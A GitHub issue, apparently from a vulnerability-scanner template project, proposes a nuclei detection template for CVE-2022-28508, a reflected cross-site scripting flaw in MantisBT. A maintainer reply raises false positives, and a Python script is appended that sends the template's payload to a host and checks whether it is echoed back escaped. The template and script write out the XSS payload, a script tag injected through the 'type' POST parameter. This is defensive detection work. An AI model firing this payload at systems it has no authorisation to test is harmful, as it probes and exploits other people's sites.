CVE-2022-28508
akincibor opened this issue · comments
Akincibor commented
```yaml
id: CVE-2022-28508

info:
  name: MantisBT < 2.25.2 - Reflected Cross-Site Scripting
  author: Akincibor
  severity: medium
  description: An XSS issue was discovered in browser_search_plugin.php in MantisBT before 2.25.2. Unescaped output of the return parameter allows an attacker to inject code into a hidden input field.
  reference:
    - https://github.com/YavuzSahbaz/CVE-2022-28508/blob/main/MantisBT%202.25.2%20XSS%20vulnurability
  tags: xss

requests:
  - method: POST
    path:
      - "{{BaseURL}}/man/browser_search_plugin.php"
    body: |
      type=text'"()%26%25<acx><ScRiPt%20>N8Zn(9266)</ScRiPt>
    headers:
      Content-Type: "application/x-www-form-urlencoded"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"()&acx><script>n8zn(9266)</script>'

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200
```
Prince Chaddha commented
Hi @akincibor, the response time to this issue was much longer than usual. We were unable to set up a vulnerable environment for this CVE, so this PR has been put on hold. We would appreciate it if someone could provide us with the debug data or steps to set up a vulnerable environment. We would need to add an additional matcher in order to prevent false positive results.
Also, feel free to join the Discord server if you have more info that you can share directly over DM.
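The maintainer's concern above is false positives: a `word` matcher that fires on the reflected probe alone cannot tell an unescaped reflection (the XSS condition) from a patched host that echoes the same value HTML-escaped. The script below is an added example, written for this thread; it is not part of the template, of nuclei-templates, or of MantisBT. It takes the template's POST body, works out the value the server actually sees after form-decoding, and classifies a response body as unescaped reflection, escaped reflection, or no reflection. The parameter name `type` and the `browser_search_plugin.php` path are taken from the template; the `base_url` argument of `probe()` is assumed to be the MantisBT root (the template uses `{{BaseURL}}/man/`). The two sample HTML responses are constructed for the example and are not captured MantisBT output.

```python
"""Classify how a reflected probe value comes back: unescaped, escaped or absent.

Added example for the nuclei-templates issue on CVE-2022-28508; not code from
the template, from nuclei-templates or from MantisBT.
"""
import html
import urllib.error
import urllib.parse
import urllib.request

# The template's request body, exactly as nuclei would send it.
RAW_BODY = "type=text'\"()%26%25<acx><ScRiPt%20>N8Zn(9266)</ScRiPt>"
PARAM = "type"                          # parameter name used by the template
PLUGIN_PATH = "browser_search_plugin.php"


def decoded_probe_value(raw_body: str = RAW_BODY, param: str = PARAM) -> str:
    """Form-decode the body the way a PHP server does (%26 -> &, %25 -> %, %20 -> space).

    This is the string that would be echoed back, so it is the string to look
    for in the response, not the percent-encoded body.
    """
    return urllib.parse.parse_qs(raw_body)[param][0]


def classify_reflection(value: str, body: str) -> str:
    """Return 'unescaped', 'escaped' or 'absent'.

    'unescaped' means the value appears verbatim (attribute/tag breakout is
    possible); 'escaped' means it only appears once HTML entities are decoded
    (htmlspecialchars-style output, i.e. the behaviour of a patched host).
    """
    if value in body:
        return "unescaped"
    if value in html.unescape(body):
        return "escaped"
    return "absent"


def build_sample(value: str, escaped: bool) -> str:
    """Constructed hidden-input response for offline testing (not MantisBT output)."""
    shown = html.escape(value, quote=True) if escaped else value
    return (
        "<html><body><form>"
        f'<input type="hidden" name="{PARAM}" value="{shown}"/>'
        "</form></body></html>"
    )


def probe(base_url: str, timeout: float = 10.0) -> str:
    """Send the template's request to a live host and classify the reflection.

    base_url is assumed to be the MantisBT root, e.g. "http://host/man/".
    Not executed by the offline checks below.
    """
    url = urllib.parse.urljoin(base_url, PLUGIN_PATH)
    req = urllib.request.Request(
        url,
        data=RAW_BODY.encode("ascii"),
        headers={"Content-Type": "application/x-www-form-urlencoded"},
        method="POST",
    )
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            body = resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as err:      # non-2xx still carries a body
        body = err.read().decode("utf-8", "replace")
    return classify_reflection(decoded_probe_value(), body)


if __name__ == "__main__":
    value = decoded_probe_value()
    print("server-side value:", value)
    for escaped in (False, True):
        sample = build_sample(value, escaped=escaped)
        print("escaped=%s ->" % escaped, classify_reflection(value, sample))
```

Only the `unescaped` result should count as a hit; `escaped` is the expected behaviour of a fixed host and is exactly the case the template's single body matcher cannot rule out on its own.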